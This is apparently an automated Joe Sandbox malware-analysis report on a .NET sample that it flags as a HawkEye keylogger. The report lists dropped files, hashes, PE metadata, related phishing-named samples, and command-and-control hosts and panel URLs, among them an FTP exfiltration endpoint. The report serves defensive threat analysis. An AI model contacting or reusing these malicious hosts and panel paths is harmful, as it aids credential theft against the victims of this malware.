                                                                  Overall analysis duration:0h 13m 2s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:light
                                                                  Sample file name:FukQGQj7cl (renamed file extension from none to exe)
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                  Number of analysed new started processes analysed:30
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.phis.troj.spyw.evad.winEXE@7/5@3/3
                                                                  EGA Information:Failed
                                                                  HDC Information:
                                                                  • Successful, ratio: 5.2% (good quality ratio 5%)
                                                                  • Quality average: 85%
                                                                  • Quality standard deviation: 24.2%
                                                                  HCA Information:
                                                                  • Successful, ratio: 99%
                                                                  • Number of executed functions: 0
                                                                  • Number of non-executed functions: 0
                                                                  Cookbook Comments:
                                                                  • Adjust boot time
                                                                  • Enable AMSI
                                                                  Warnings:
                                                                  Show All
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                                                                  • TCP Packets have been reduced to 100
                                                                  • Excluded IPs from analysis (whitelisted): 52.182.143.212, 23.211.6.115, 52.168.117.173, 131.253.33.200, 13.107.22.200, 204.79.197.200, 13.107.21.200, 23.211.4.86, 20.82.210.154, 205.185.216.42, 205.185.216.10, 20.54.110.249, 40.112.88.60, 80.67.82.235, 80.67.82.211
                                                                  • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  16:47:08API Interceptor218x Sleep call for process: FukQGQj7cl.exe modified
                                                                  16:47:58API Interceptor5x Sleep call for process: InstallUtil.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  45.141.152.18Confirmarea platii.pdf.exeGet hashmaliciousBrowse
                                                                  • alfawood.us/xsclk/index.php
                                                                  Confirmarea platii.pdf.exeGet hashmaliciousBrowse
                                                                  • alfawood.us/mkdgs/index.php
                                                                  e-dekont.html.exeGet hashmaliciousBrowse
                                                                  • alfawood.us/mkdgs/index.php
                                                                  Credit Advice -TT6635993652908.PDF.exeGet hashmaliciousBrowse
                                                                  • alfawood.us/mkdgs/index.php
                                                                  Dekont.pdf.exeGet hashmaliciousBrowse
                                                                  • alfawood.us/xsclk/index.php
                                                                  Dekont.pdf.exeGet hashmaliciousBrowse
                                                                  • blkgrupdoom.info/scgn/index.php
                                                                  e-dekont.html.exeGet hashmaliciousBrowse
                                                                  • blkgrupdoom.info/scgn/index.php
                                                                  Dekont.pdf.exeGet hashmaliciousBrowse
                                                                  • blkgrupdoom.info/scgn/index.php

                                                                  Domains

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  ftp.badonfashoin.comNew Updated 20210810.docGet hashmaliciousBrowse
                                                                  • 45.141.152.18
                                                                  82658.exeGet hashmaliciousBrowse
                                                                  • 45.141.152.18
                                                                  87597.exeGet hashmaliciousBrowse
                                                                  • 45.141.152.18

                                                                  ASN

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  M247GBNew Updated 20210810.docGet hashmaliciousBrowse
                                                                  • 45.141.152.18
                                                                  Richiesta di nuove quotazioni (August_2021)_pdf.exeGet hashmaliciousBrowse
                                                                  • 195.206.105.10
                                                                  qfgP28anogGet hashmaliciousBrowse
                                                                  • 196.19.8.214
                                                                  j4nJWqkYkI.dllGet hashmaliciousBrowse
                                                                  • 83.97.20.174
                                                                  Attachment.exeGet hashmaliciousBrowse
                                                                  • 5.181.234.138
                                                                  PAYMENT_CHECK.PDF.EXEGet hashmaliciousBrowse
                                                                  • 217.138.212.57
                                                                  DHL_consignment_number#6225954704.exeGet hashmaliciousBrowse
                                                                  • 188.72.124.14
                                                                  PAYMENT FOR OVERDUE INVOICE.exeGet hashmaliciousBrowse
                                                                  • 37.120.210.211
                                                                  Paymentcheck.pdf.exeGet hashmaliciousBrowse
                                                                  • 217.138.212.57
                                                                  kEtjx4XwPd.exeGet hashmaliciousBrowse
                                                                  • 37.221.121.20
                                                                  w4DEaimFEtGet hashmaliciousBrowse
                                                                  • 194.71.126.19
                                                                  4A7rphFZrYGet hashmaliciousBrowse
                                                                  • 206.127.221.64
                                                                  fJn3N6piJMGet hashmaliciousBrowse
                                                                  • 45.11.181.37
                                                                  1sHut1OhEUGet hashmaliciousBrowse
                                                                  • 45.11.181.37
                                                                  dIuTSU7cWxGet hashmaliciousBrowse
                                                                  • 45.11.181.37
                                                                  WVS6wDRacfGet hashmaliciousBrowse
                                                                  • 45.11.181.37
                                                                  30Bzshze5JGet hashmaliciousBrowse
                                                                  • 45.11.181.37
                                                                  7D2r6OGZYrGet hashmaliciousBrowse
                                                                  • 45.11.181.37
                                                                  K2pnt8OlReGet hashmaliciousBrowse
                                                                  • 38.206.34.72
                                                                  clip.exeGet hashmaliciousBrowse
                                                                  • 185.189.112.27

                                                                  JA3 Fingerprints

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                  54328bd36c14bd82ddaa0c04b25ed9adthgYp9F5Xk.exeGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  6tgS8z4nyu.exeGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  pago ref210721.exeGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  A3Xzw2gfbY.exeGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  PO IN-2108,pdf.exeGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  sunnyzx.exeGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  _RFQ____.EXEGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  scan20210805122905.ppamGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  URGENT DRAWING AND QUOTATION.ppamGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  S010891121011862 pdf.exeGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  BANK INFORMATION.exeGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  PoC.docGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  PO#578946.arj.exeGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  REQUEST FOR QUOTATION - PCIHBV2021MRP2720.exeGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  Swift E-Posta Bildirimi.zip.exeGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  Payment copy.exeGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  xAUiSzJPP1.exeGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  HprR7lLOSs.exeGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  ZFgurhY9Pk.exeGet hashmaliciousBrowse
                                                                  • 142.250.185.196
                                                                  ZYJY-2021010007.DBLF0445+446+441.exeGet hashmaliciousBrowse
                                                                  • 142.250.185.196

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FukQGQj7cl.exe.log
                                                                  Process:C:\Users\user\Desktop\FukQGQj7cl.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1214
                                                                  Entropy (8bit):5.358666369753595
                                                                  Encrypted:false
                                                                  SSDEEP:24:ML9E4Ks2pE4KAE4Kx1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7a:MxHKXpHKAHKx1qHxviYHKhQnoPtHoxHe
                                                                  MD5:EA89F05C52A783E37251BFDA12B31885
                                                                  SHA1:96236E27A69CF5271ACCF849A0F4B7058E037D7E
                                                                  SHA-256:1EDA95BE1605ED3ABDAB15126811D528B384A9C02C3E7138CEC1BB5BA54B6BD5
                                                                  SHA-512:408E7E41062BC9AE729DAC0CA7652FD8A23618A2E984E59CCA0CD4F0678BE2A4E3DDFAAF956FEC2EE70D7A243C10474727F4F7A5DE7DAFCA61AA6048627BDBC0
                                                                  Malicious:true
                                                                  Reputation:unknown
                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configu
                                                                  C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                  Process:C:\Users\user\Desktop\FukQGQj7cl.exe
                                                                  File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):41064
                                                                  Entropy (8bit):6.164873449128079
                                                                  Encrypted:false
                                                                  SSDEEP:384:FtpFVLK0MsihB9VKS7xdgE7KJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+sPZTd:ZBMs2SqdD86Iq8gZZFyViML3an
                                                                  MD5:EFEC8C379D165E3F33B536739AEE26A3
                                                                  SHA1:C875908ACBA5CAC1E0B40F06A83F0F156A2640FA
                                                                  SHA-256:46DEE184523A584E56DF93389F81992911A1BA6B1F05AD7D803C6AB1450E18CB
                                                                  SHA-512:497847EC115D9AF78899E6DC20EC32A60B16954F83CF5169A23DD3F1459CB632DAC95417BD898FD1895C9FE2262FCBF7838FCF6919FB3B851A0557FBE07CCFFA
                                                                  Malicious:true
                                                                  Antivirus:
                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                  Reputation:unknown
                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Z.Z..............0..T...........r... ........@.. ....................................`.................................4r..O....................b..h>...........p............................................... ............... ..H............text....R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B................hr......H........"..|J..........lm.......o......................................2~.....o....*.r...p(....*VrK..p(....s.........*..0..........(....(....o....o....(....o.... .....T(....o....(....o....o ...o!....4(....o....(....o....o ...o".....(....rm..ps#...o....($........(%....o&....ry..p......%.r...p.%.(.....(....('....((.......o)...('........*.*................"..(*...*..{Q...-...}Q.....(+...(....(,....(+...*"..(-...*..(....*..(.....r...p.(/...o0...s....}T...*....0.. .......~S...-.s
                                                                  C:\Users\user\AppData\Local\Temp\holderwb.txt
                                                                  Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
                                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):2
                                                                  Entropy (8bit):1.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:Qn:Qn
                                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: ..
                                                                  C:\Users\user\AppData\Roaming\pid.txt
                                                                  Process:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4
                                                                  Entropy (8bit):2.0
                                                                  Encrypted:false
                                                                  SSDEEP:3:Pn:P
                                                                  MD5:7A7C6A5B2F18E21E23049634CEC06C68
                                                                  SHA1:1E4F45AEC983B6E26F4EDA228E05D4E16CE1E225
                                                                  SHA-256:2FE704A610323B1C0F3375DBEAEE0FA1067FDE32D0130E24D44A4BEFDCA9679E
                                                                  SHA-512:9FF4DD011E511B7C0BFB3CC118EB18D50DE8DF117F1DD3CFE6147450FCC300F4B00138DBE33BE1F7D2D817CCE44A78B8FFCFDA10F757E2D478601BD6EA67495C
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: 6284
                                                                  C:\Users\user\AppData\Roaming\pidloc.txt
                                                                  Process:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):49
                                                                  Entropy (8bit):4.361973558701858
                                                                  Encrypted:false
                                                                  SSDEEP:3:oNWXp5cViE2J5xAIOWRxRI0dAn:oNWXp+N23f5RndA
                                                                  MD5:8069A620598F6D0795A045BC4C040FCE
                                                                  SHA1:BE6C7D1B6E3A49925674F335C601A53E985A2496
                                                                  SHA-256:85E54950497C2B5262439CC09BB7E0779225EAFF0C50B75D59DECE689F2B0625
                                                                  SHA-512:D9AB55D7A597CB3DB20E069AA4893654C7033E42738AD5CF3AA489C5745E3D85CBAD12530542241CD2133C52E108368AA5DB7255692177745A1EEAAFB3398306
                                                                  Malicious:false
                                                                  Reputation:unknown
                                                                  Preview: C:\Users\user\AppData\Local\Temp\InstallUtil.exe

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):6.577327226998129
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:FukQGQj7cl.exe
                                                                  File size:1245696
                                                                  MD5:83f58ecf0778e3b0acca8497df23ef23
                                                                  SHA1:a2123e816fcd387873272e022220fbc05b96d392
                                                                  SHA256:437fae5aa2cad8ddb1fe3e316afdc6a1fdd2676084131fdc082ffdc8a53f066d
                                                                  SHA512:aa80d30c7f4234dfd26170b7817788dbdda9c02897d0ac788c253d815a14f444df8dce47c59b05875821f196cb3571de4ec584689059c1a86b7f64f504bf4a63
                                                                  SSDEEP:24576:yVwq/EUmGq/wKgDyT/vcKcPw+U6kulaoS18PNMnDbMZ:yVw8lq/wK4wcKcPrXIIN6P
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......6................................. ... ....@.. .......................`............`................................

                                                                  File Icon

                                                                  Icon Hash:00828e8e8686b000

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x53179e
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                  Time Stamp:0x36E3D1D7 [Mon Mar 8 13:34:15 1999 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x13174c0x4f.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x1320000x5f6.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1340000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000x12f7a40x12f800False0.65637709792data6.5816543949IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x1320000x5f60x600False0.431640625data4.20085481651IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x1340000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_VERSION0x1320a00x36cdata
                                                                  RT_MANIFEST0x13240c0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Version Infos

                                                                  DescriptionData
                                                                  Translation0x0000 0x04b0
                                                                  LegalCopyrightCopyright 2020
                                                                  Assembly Version1.0.0.0
                                                                  InternalNameTRCoManagementSystem.exe
                                                                  FileVersion1.0.0.0
                                                                  CompanyName
                                                                  LegalTrademarks
                                                                  Comments
                                                                  ProductNameEICANotifications
                                                                  ProductVersion1.0.0.0
                                                                  FileDescriptionEICANotifications
                                                                  OriginalFilenameTRCoManagementSystem.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  08/10/21-16:48:16.909986TCP2020410ET TROJAN HawkEye Keylogger FTP4974521192.168.2.345.141.152.18

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Aug 10, 2021 16:47:03.286838055 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.319209099 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.319341898 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.344588995 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.371298075 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.378534079 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.378568888 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.378587008 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.378601074 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.378699064 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.390443087 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.417469978 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.467937946 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.494936943 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.527563095 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.587394953 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.587471962 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.587511063 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.587548018 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.587591887 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.587672949 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.587713957 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.589498043 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.589549065 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.589603901 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.591752052 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.591803074 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.591831923 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.594002962 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.594033003 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.594094992 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.596246004 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.596271038 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.597017050 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.598578930 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.598612070 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.598648071 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.614294052 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.614326000 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.614408970 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.615329981 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.615350008 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.615407944 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.617686033 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.617705107 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.617768049 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.619887114 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.619906902 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.619961977 CEST49715443192.168.2.3142.250.185.196
                                                                  Aug 10, 2021 16:47:03.622170925 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.622189999 CEST44349715142.250.185.196192.168.2.3
                                                                  Aug 10, 2021 16:47:03.622253895 CEST49715443192.168.2.3142.250.185.196
